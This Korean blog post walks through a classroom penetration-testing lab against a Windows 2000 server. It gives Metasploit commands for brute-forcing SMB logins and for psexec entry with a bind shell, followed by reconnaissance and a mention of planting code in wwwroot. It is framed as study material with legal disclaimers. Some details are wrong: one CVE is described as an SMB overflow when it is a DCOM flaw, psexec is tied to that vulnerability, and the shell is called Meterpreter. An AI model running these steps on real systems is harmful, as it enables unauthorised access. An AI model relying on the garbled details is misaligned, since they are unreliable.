[모의해킹] Windows 2000 기반의 운영체제 침투하기

! 이 포스트의 내용은 2019년 전공 강의에서 다룬 리눅스 보안 실습의 기록용이며, 이는 학습 목적으로만 사용되어야 합니다.

! 어떠한 경우에도 이러한 기술을 악용하거나 불법적인 활동에 사용해서는 안 됩니다.

 

! 모의 해킹과 관련된 실습은 합법적인 환경에서만 수행되어야 하며, 무단으로 다른 사람의 시스템에 접근하는 등의 행위는 법적인 문제로 이어질 수 있습니다. 이러한 기술을 사용할 때에는 항상 윤리적인 책임을 갖고 행동해야 합니다.

 

💡 취약점 정리

Windows 2000에서 SMB 프로토콜과 관련된 취약점은 여러가지가 있지만, ``psexec``공격과 직접적으로 연관된 대표적인 취약점은 SMB 인증 우회 또는 관리자 권한 탈취와 관련된 것이다. 

 

📌 SMB 인증 우회 취약점 개요 (CVE-2000-0871)

• 영향받는 소프트웨어: Microsoft IIS 5.0 (Windows 2000, Windows XP)
• 취약점 유형: SMB 인증 우
• 공격 난이도: 상대적으로 쉬움 (인증 우회가 가능하고, 원격에서 쉽게 접근 가능)
• 공격 결과: 원격 코드 실행 (RCE)
• 공격 방식: SMB 프로토콜을 통해 잘못된 사용자 정보로 인증을 우회하여 원격에서 명령 실행 또는 파일 접근

NVD - CVE-2000-0871

 

📌 SMB 버퍼 오버플로우 취약점 개요 (CVE-2003-0352)

• 영향받는 소프트웨어: Microsoft Windows 2000, Windows XP, Windows Server 2003 (SMB 서비스 관련)
• 취약점 유형: 버퍼 오버플로우 (Buffer Overflow)
• 공격 난이도: 쉬움 (원격에서 SMB 포트를 통해 악용 가능)
• 공격 결과: 원격 코드 실행 (RCE)
• 공격 방식:특정 SMB 패킷을 전송하여 버퍼 오버플로우를 유발

NVD - CVE-2003-0352

---

1️⃣ 실습 환경 구성

실습을 위해서는 Kali Linux와 타겟 윈도우 서버(윈도우 2000 서버)가 필요하다.

윈도우 2000 서버는 기본적으로 SMB 서비스를 제공하고 있으니, 이 부분을 타겟으로 삼을 수 있다.

1. Kali Linux (공격자 시스템)
2. Windows 2000 Server (타겟 시스템)
3. 타겟 시스템에 시도할 사용자명 목록이 있는 파일 / 패스워드 목록이 있는 파일

---

2️⃣ SMB 로그인 시도

``use_auxiliary/scanner/smb/smb_login``은 SMB 서버에서 가능한 사용자 계정과 비밀번호 조합을 찾는 데 사용된다.

이를 통해 시스템에 대한 인증 정보를 탈취할 수 있다.

 

🔹1. Metasploit 실행

msfconsole

---

🔹2. SMB 로그인 스캐너 설정

``auxiliary/scanner/smb/smb_login``을 사용해서 타겟 윈도우 2000 서버에서 ID와 비밀번호 탈취를 시도한다.

use auxiliary/scanner/smb/smb_login
set rhost <타겟 서버 IP>
set user_file <사용자명 파일 경로>
set pass_file <패스워드 파일 경로>
set stop_on_success true
set threads 256
run

• ``use auxiliary/scanner/smb/smb_login``: Metasploit의 ``smb_login`` 모듈을 사용하여 SMB 로그인 공격을 수행
• ``rhost``: 공격 대상 서버의 IP를 지정
• ``user_file``: 시도할 사용자명 목록이 있는 파일을 설정
• ``pass_file``: 시도할 비밀번호 목록이 있는 파일을 설정
• ``stop_on_success true``: 로그인에 성공하면 즉시 공격을 중단
• ``threads 256``: 멀티스레딩에 사용하여 256개의 쓰레드를 동시에 실행 (속도 향상 가능)

이 명령어를 통해 여러 사용자명/비밀번호 조합을 시도하고 성공적인 로그인 시도를 확인할 수 있다.

📌 공격 결과

• 로그인 정보 알아냄
• ID: administrator, Password: 123456

---

3️⃣ 윈도우 2000 서버의 삼바 서비스 취약점 활용 (psexec 침투)

🔹1. 삼바 서비스 취약점 확인

SMB 포트가 열려있으면 취약점이 있을 수 있다. ``nmap``을 통해 확인 가능하다.

nmap -p 139,445 --script smb-vuln* <타겟 IP>

---

🔹2. psexec 이용한 원격 침투

``ms03_026_dcom`` 취약점이 존재하는 시스템에서는 ``psexec``를 사용하여 원격에서 명령을 실행할 수 있다.

use exploit/windows/smb/psexec
set payload windows/shell/bind_tcp
set rhost <타겟 IP>
set smbuser <탈취한 사용자명>
set smbpass <탈취한 비밀번호>
exploit

• ``use exploit/windows/smb/psexec``: Windows SMB 이용해 ``psexec``방식으로 명령을 실행하는 익스플로잇을 사용
• ``payload windows/shell/bind_tcp``: Windows에서 bind shell (TCP 포트 리스닝) 방식으로 쉘을 실행
• ``rhosts``: 공격 대상 서버의 IP를 지정
• ``smbuser``: 앞서 ``smb_login`` 모듈로 얻은 사용자 계정 입력
• ``smbpass``: 앞서 ``smb_login`` 모듈로 얻은 사용자 계정의 패스워드 입력

침투에 성공하면 Meterpreter 세션을 통해 타겟 시스템을 제어할 수 있다.

---

🔹3. 대상 시스템 탐색 및 네트워크 분석

C:\>dir

• ``dir`` 명령어를 사용하여 ``C:`` 드라이브의 파일 시스템에 접근하여 해당 디렉터리 안에 있는 모든 파일과 폴더 확인
• 이를 통해 시스템의 파일 구조를 분석하고 추가적인 공격 경로를 탐색 가능
• 사용 가능한 다른 명령어는 ``help``로 확인 가능

---

C:\Inetpub>cd wwwroot
C:\Inetpub\wwwroot>dir

• ``wwwroot``는 보통 웹 서버가 사용하는 기본디렉터리 이름이다.
• 예를 들어, IIS(Internet Information Services) 웹 서버는 기본적으로 ``C:\inetpub\wwwroot``라는 디렉터리를 사용하여 웹 페이지 파일을 저장한다.
• 만약 웹 서버의 취약점이 존재한다면, 여기에 악성 코드를 업로드하거나, 기존 파일을 수정할 수 있다.

---

C:\>netstat -n

• ``netstat`` 명령어는 네트워크 연결 상태를 확인하는 데 사용된다.
• ``netstat -n``을 실행하면 현재 시스템에서 열린 포트, 연결된 IP 주소, 상태(예: LISTENING, ESTABLISHED 등)를 확인할 수 있다.
• 이를 통해 공격자는 해당 시스템이 어떤 외부 시스템과 통신 중인지를 알 수 있다.
• 예를 들어, 특정 포트가 열린 상태로 서비스가 실행 중이라면, 해당 서비스의 취약점을 악용할 수 있는 기회를 찾을 수 있다.

---